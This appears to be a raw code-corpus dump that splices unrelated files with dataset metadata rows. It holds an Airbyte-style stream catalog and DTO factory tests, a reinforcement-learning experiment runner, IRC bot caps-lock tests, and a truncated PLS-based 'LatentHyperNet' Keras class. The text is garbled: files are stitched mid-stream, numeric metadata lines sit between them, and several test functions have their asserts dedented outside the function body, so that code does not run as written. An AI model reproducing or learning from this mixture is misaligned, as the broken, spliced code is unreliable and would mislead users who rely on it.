'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'user_id': {'type': ['null', 'integer']}, 'repository': {'type': ['string']}, 'starred_at': {'type': ['null', 'string'], 'format': 'date-time'}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['starred_at'], 'sourceDefinedPrimaryKey': [['user_id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['starred_at'], 'destinationSyncMode': 'append', 'primaryKey': [['user_id']], 'aliasName': 'stargazers', 'selected': True}}, {'stream': {'name': 'tags', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'name': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'tarball_url': {'type': ['null', 'string']}, 'zipball_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [], 'aliasName': 'tags', 'selected': True}}, {'stream': {'name': 'teams', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'slug': {'type': ['null', 'string']}, 'parent': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'privacy': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'permission': {'type': ['null', 'string']}, 'repository': {'type': ['null', 'string']}, 'description': {'type': ['null', 'string']}, 'members_url': {'type': ['null', 'string']}, 'organization': {'type': ['null', 'string']}, 'repositories_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'teams', 'selected': True}}, {'stream': {'name': 'users', 'jsonSchema': {'type': ['null', 'object'], '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'organization': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': 
None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'users', 'selected': True}}]}
def test_dto__get_identity(dummy_source_dto, dummy_destination_dto, dummy_connection_dto):
    """
    Test get_identity on source, destination, and connection DTOs
    Verifies the (id, name) pair tracks the underlying attributes, including when the id is None
    """
assert dummy_source_dto.get_identity()[0] == dummy_source_dto.source_id
assert dummy_source_dto.get_identity()[1] == dummy_source_dto.name
assert dummy_destination_dto.get_identity()[0] == dummy_destination_dto.destination_id
assert dummy_destination_dto.get_identity()[1] == dummy_destination_dto.name
assert dummy_connection_dto.get_identity()[0] == dummy_connection_dto.connection_id
assert dummy_connection_dto.get_identity()[1] == dummy_connection_dto.name
dummy_source_dto.source_id = None
dummy_destination_dto.destination_id = None
dummy_connection_dto.connection_id = None
assert dummy_source_dto.get_identity()[0] is None
assert dummy_destination_dto.get_identity()[0] is None
assert dummy_connection_dto.get_identity()[0] is None
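# The three near-identical blocks above could also be written as a single
# parametrized test; a sketch assuming the same fixtures (illustrative, not a
# drop-in replacement):
#
#     @pytest.mark.parametrize('dto_fixture, id_attr', [
#         ('dummy_source_dto', 'source_id'),
#         ('dummy_destination_dto', 'destination_id'),
#         ('dummy_connection_dto', 'connection_id'),
#     ])
#     def test_dto__get_identity_parametrized(dto_fixture, id_attr, request):
#         dto = request.getfixturevalue(dto_fixture)
#         assert dto.get_identity()[0] == getattr(dto, id_attr)
#         assert dto.get_identity()[1] == dto.name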
def test_dto_factory__build_source_dto(dummy_airbyte_dto_factory, dummy_source_dict, dummy_source_dto):
"""
Test AirbyteDtoFactory.build_source_dto
"""
t = dummy_airbyte_dto_factory.build_source_dto(dummy_source_dict)
assert t.source_definition_id == dummy_source_dto.source_definition_id
assert t.source_id == dummy_source_dto.source_id
assert t.workspace_id == dummy_source_dto.workspace_id
assert t.connection_configuration == dummy_source_dto.connection_configuration
assert t.source_name == dummy_source_dto.source_name
assert t.name == dummy_source_dto.name
assert t.tags == dummy_source_dto.tags
def test_dto_factory__build_destination_dto(dummy_airbyte_dto_factory, dummy_destination_dict, dummy_destination_dto):
"""
Test AirbyteDtoFactory.build_destination_dto
"""
t = dummy_airbyte_dto_factory.build_destination_dto(dummy_destination_dict)
assert t.destination_definition_id == dummy_destination_dto.destination_definition_id
assert t.destination_id == dummy_destination_dto.destination_id
assert t.workspace_id == dummy_destination_dto.workspace_id
assert t.connection_configuration == dummy_destination_dto.connection_configuration
assert t.destination_name == dummy_destination_dto.destination_name
assert t.name == dummy_destination_dto.name
assert t.tags == dummy_destination_dto.tags
def test_dto_factory__build_connection_dto__existing_connection(dummy_airbyte_dto_factory, dummy_existing_connection_dict,
dummy_connection_dto):
"""
Test AirbyteDtoFactory.build_connection_dto using a dict for an existing connection
Ensures that the ConnectionDto being built by the AirbyteDtoFactory is faithful to the input dict
"""
t = dummy_airbyte_dto_factory.build_connection_dto(dummy_existing_connection_dict)
assert t.connection_id == dummy_connection_dto.connection_id
assert t.source_id == dummy_connection_dto.source_id
assert t.destination_id == dummy_connection_dto.destination_id
assert t.name == dummy_connection_dto.name
assert t.prefix == dummy_connection_dto.prefix
assert t.schedule == dummy_connection_dto.schedule
assert t.status == dummy_connection_dto.status
assert t.sync_catalog == dummy_connection_dto.sync_catalog
def test_dto_factory__build_connection_dto__new_connection(dummy_airbyte_dto_factory, dummy_new_connection_dict,
dummy_connection_dto):
"""
    Test AirbyteDtoFactory.build_connection_dto using a dict for a new connection
Ensures that the ConnectionDto being built by the AirbyteDtoFactory is faithful to the input dict
"""
t = dummy_airbyte_dto_factory.build_connection_dto(dummy_new_connection_dict)
assert t.source_name == dummy_connection_dto.source_name
assert t.destination_name == dummy_connection_dto.destination_name
assert t.name == dummy_connection_dto.name
assert t.prefix == dummy_connection_dto.prefix
assert t.schedule == dummy_connection_dto.schedule
assert t.status == dummy_connection_dto.status
def test_dto_factory__build_connection_group_dto(dummy_airbyte_dto_factory, dummy_connection_group_dict,
dummy_connection_group_dto):
"""
Test AirbyteDtoFactory.build_connection_group_dto
Experimental
"""
t = dummy_airbyte_dto_factory.build_connection_group_dto(dummy_connection_group_dict)
assert t.group_name == dummy_connection_group_dto.group_name
assert t.source_tags == dummy_connection_group_dto.source_tags
assert t.destination_tags == dummy_connection_group_dto.destination_tags
assert t.prefix == dummy_connection_group_dto.prefix
assert t.schedule == dummy_connection_group_dto.schedule
assert t.status == dummy_connection_group_dto.status
assert t.sync_catalog == dummy_connection_group_dto.sync_catalog
def test_dto_factory__populate_secrets(dummy_airbyte_dto_factory, dummy_secrets_dict, dummy_source_dto,
dummy_destination_dto):
"""
Test AirbyteDtoFactory.populate_secrets
Verifies placeholder secrets in the DTOs are being correctly overridden
"""
new_dtos = {'sources': [dummy_source_dto], 'destinations': [dummy_destination_dto]}
dummy_airbyte_dto_factory.populate_secrets(dummy_secrets_dict, new_dtos)
assert new_dtos['sources'][0].connection_configuration['access_token'] == 'ghp_SECRET_TOKEN'
assert new_dtos['destinations'][0].connection_configuration['password'] == 'SECRET_POSTGRES_PASSWORD' | 334.231788 | 42,831 | 0.603103 | 5,332 | 50,469 | 5.531883 | 0.069955 | 0.187144 | 0.229726 | 0.151004 | 0.822959 | 0.757899 | 0.71569 | 0.669345 | 0.63056 | 0.613914 | 0 | 0.005146 | 0.095128 | 50,469 | 151 | 42,832 | 334.231788 | 0.640733 | 0.016862 | 0 | 0.163265 | 0 | 0 | 0.514528 | 0.026388 | 0 | 0 | 0 | 0 | 0.704082 | 1 | 0.102041 | false | 0.010204 | 0.020408 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cdb0406c208a87258d238272949446bd64e3d8c1 | 7,308 | py | Python | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 15:36:15 2020
@author: mincheol
"""
from baselines import run
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v3', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [6]:
# for seed in [10,750,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/animate/harsh_65/PassiveCtrl_randomly_heavy/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/animate/harsh_65/PassiveCtrl_randomly_heavy/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v2', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [3]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/chip/harsh_85/For_IM/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/chip/harsh_85/For_IM/force_dist_data_before/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [4]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/block/test/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/block/test/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v5', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/block/harsh_65/For_IM/RL/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/block/harsh_65/For_IM/RL/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v6', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/chip/harsh_85/For_IM/RL/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/chip/harsh_85/For_IM/RL/force_dist_data_before/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=NuFingersRotate-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/NuFingers/harsh_65/For_IM/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/NuFingers/harsh_65/IR/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=NuFingersRotate-v2', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/NuFingers/harsh_65/For_IM/RL/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/NuFingers/harsh_65/For_IM/RL/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=CheolFingersManipulate-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [5]:
# for seed in [10]:
# for pert in ['none']:
# loadpath = '--load_path=./models/Dark/Manipulate/Delayed_env/SCAPE_10/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# eval_env = '--eval_env=True'
# finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=CheolFingersSearch-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [3]:
# for seed in [10]:
# for pert in ['none']:
# loadpath = '--load_path=./PASCAPE/models/Dark/Search/PASCAPE_DR/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# eval_env = '--eval_env=False'
# finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
# run.main(finalargs)
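# Active configuration: each string below is rendered in the CLI form that
# baselines.run.main expects; the commented-out blocks above are earlier
# environment/model combinations kept for reference.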
defaultargs = ['--alg=her','--env=CheolFingersLiquid-v1', '--num_timesteps=0', '--play']
if __name__ == '__main__':
for dim in [6]:
for seed in [10]:
for pert in ['none']:
loadpath = '--load_path=./PASCAPE/models/Liquid/PASCAPE_DR/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
perturb = '--perturb={}'.format(pert)
algdim = '--algdim={}'.format(dim)
eval_env = '--eval_env=True'
finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
run.main(finalargs) | 49.378378 | 168 | 0.533525 | 758 | 7,308 | 4.861478 | 0.133245 | 0.065943 | 0.046133 | 0.054274 | 0.93867 | 0.92673 | 0.92673 | 0.903121 | 0.903121 | 0.878697 | 0 | 0.02887 | 0.293788 | 7,308 | 148 | 169 | 49.378378 | 0.685139 | 0.831828 | 0 | 0 | 0 | 0 | 0.185641 | 0.101538 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a90e842b7b21aba1f15adbfd21da8f97ea0e1508 | 8,173 | py | Python | hallo/test/modules/channel_control/test_channel_caps.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/channel_control/test_channel_caps.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/channel_control/test_channel_caps.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
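# All tests below follow the same pattern: dispatch an EventMessage carrying a
# "channel caps" command, read the bot's reply back via get_send_data, and
# assert on the channel's use_caps_lock flag.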
def test_caps_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert test_hallo.test_chan.use_caps_lock
# Try toggling again
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert not test_hallo.test_chan.use_caps_lock
def test_caps_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps on")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan.use_caps_lock
def test_caps_off(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps off")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan.use_caps_lock
def test_caps_channel_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
# Try toggling again
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_channel_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel on"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
def test_caps_channel_off(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel off"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_on_channel(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps on other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
def test_caps_off_channel(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps off other_channel"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_not_in_channel_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_not_in_channel_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel on")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_no_bool(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel word"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
| 43.705882 | 121 | 0.749541 | 1,204 | 8,173 | 4.70515 | 0.038206 | 0.217652 | 0.259312 | 0.114034 | 0.990468 | 0.990468 | 0.990468 | 0.989585 | 0.989585 | 0.989585 | 0 | 0.009994 | 0.155267 | 8,173 | 186 | 122 | 43.94086 | 0.810545 | 0.004527 | 0 | 0.716049 | 0 | 0 | 0.107218 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.067901 | false | 0 | 0.006173 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a919dccda4eeb340bd9e8dd9f1657d6a17af3ca9 | 7,039 | py | Python | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | 2 | 2019-07-18T21:08:13.000Z | 2020-03-21T10:44:26.000Z | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | null | null | null | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | null | null | null | import numpy as np
import copy
from sklearn.base import BaseEstimator
from sklearn.base import ClassifierMixin
from sklearn.cross_decomposition import PLSRegression
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from keras.models import Model
from keras.layers import Dense, Flatten, Lambda, concatenate
class LatentHyperNet(BaseEstimator, ClassifierMixin):
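    """Dimensionality-reducing "hyper net" built on top of a trained Keras model.

    Fits one PLSRegression per selected layer (optionally one per class in a
    one-vs-all scheme) on the flattened layer activations, and can re-express
    the fitted projections as frozen Dense layers appended to the network.
    """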
__name__ = 'Latent Hyper Net'
def __init__(self, n_comp=2,
dm_method=None, oaa=False, as_network=True,
model=None, layers=None, batch_size=32):
self.n_comp = n_comp
self.dm_layer = []
self.dm_method = dm_method
self.oaa = oaa
self.as_network = as_network
self.model = self.custom_model(model=model, layers=layers)
self.layers = layers
self.batch_size = batch_size
def custom_model(self, model, layers):
for i in range(0, len(model.layers)):
if i > layers[-1]:
model.layers.pop()
outputs = []
for i in layers:
layer = model.get_layer(index=i)
outputs.append(Flatten()(layer.output))
model = Model(model.input, outputs)
return model
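    # pls_as_network() re-expresses each fitted PLS projection inside the Keras
    # graph: the training mean/std become a Lambda standardisation step and the
    # PLS rotation matrix (x_rotations_) becomes the weights of a frozen,
    # bias-free Dense layer, so the projection runs as part of predict().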
def pls_as_network(self):
pls_into_fc = []
for layer_idx in range(0, len(self.layers)):
for i in range(0, len(self.dm_layer[layer_idx])):
dm = self.dm_layer[layer_idx][i]
id = '{}_{}'.format(layer_idx, i)
w = dm.x_rotations_
x_mean = dm.x_mean_
x_std = dm.x_std_
H = self.model.get_layer(index=self.layers[layer_idx]).output
H = Flatten(name='flatten_pls_' + id)(H)
H = Lambda(lambda x: (x - x_mean) / x_std)(H)
H = Dense(self.n_comp, weights=[w],
use_bias=False,
trainable=False,
name='pls_model_' + id)(H)
pls_into_fc.append(H)
H = None
H = concatenate(pls_into_fc)
self.model = Model(self.model.input, H)
for i in range(0, len(self.model.layers)):
self.model.layers[i].trainable = False
return self
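    # fit() expects one-hot labels: with oaa=True it trains one PLS model per
    # class on +/-1 targets for every selected layer; otherwise a single PLS
    # model per layer is fitted against the full label matrix.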
def fit(self, X, y):
if X.shape[0] != y.shape[0]:
            raise ValueError("X and y must contain the same number of samples")
if (y.shape[1]==1):
self.oaa = False
self.dm_layer = [[] for i in range(0, len(self.layers))]
dm_template = PLSRegression(n_components=self.n_comp)
X = self.model.predict(X)
y_tmp = np.argmax(y, axis=1)
num_classes = np.unique(y_tmp)
for layer_idx in range(0, len(self.layers)):
if self.oaa:
for c in num_classes:
target = np.ones(y_tmp.shape)
target[y_tmp != c] = -1
dm = copy.copy(dm_template)
dm.fit(X[layer_idx], target)
self.dm_layer[layer_idx].append(dm)
del dm
else:
dm = copy.copy(dm_template)
dm.fit(X[layer_idx], y)
self.dm_layer[layer_idx].append(dm)
del dm
if self.as_network:
self.pls_as_network()
return self
def transform(self, X):
proj_x = None
        X = self.model.predict(X, batch_size=self.batch_size)
for layer_idx in range(0, len(self.layers)):
for pls_model in self.dm_layer[layer_idx]:
if proj_x is None:
proj_x = pls_model.transform(X[layer_idx])
else:
proj_tmp = pls_model.transform(X[layer_idx])
proj_x = np.column_stack((proj_x, proj_tmp))
return proj_x
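# Illustrative usage sketch (not part of the original module); `base_model`,
# the layer indices and the data arrays are hypothetical placeholders:
#
#     net = LatentHyperNet(n_comp=2, model=base_model, layers=[4, 8, 12],
#                          oaa=True, as_network=False)
#     net.fit(x_train, y_train_onehot)  # y must be one-hot; argmax is taken
#     latent = net.transform(x_test)    # (n_samples, n_comp * n_layers * n_classes)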
class LatentHyperNetSingleProjection(BaseEstimator, ClassifierMixin):
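    """Variant of LatentHyperNet that concatenates all selected layer
    activations into a single feature vector before fitting the PLS
    projection(s), instead of projecting each layer separately.
    """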
__name__ = 'Latent Hyper Net'
def __init__(self, n_comp=2,
dm_method=None, oaa=False, as_network=True,
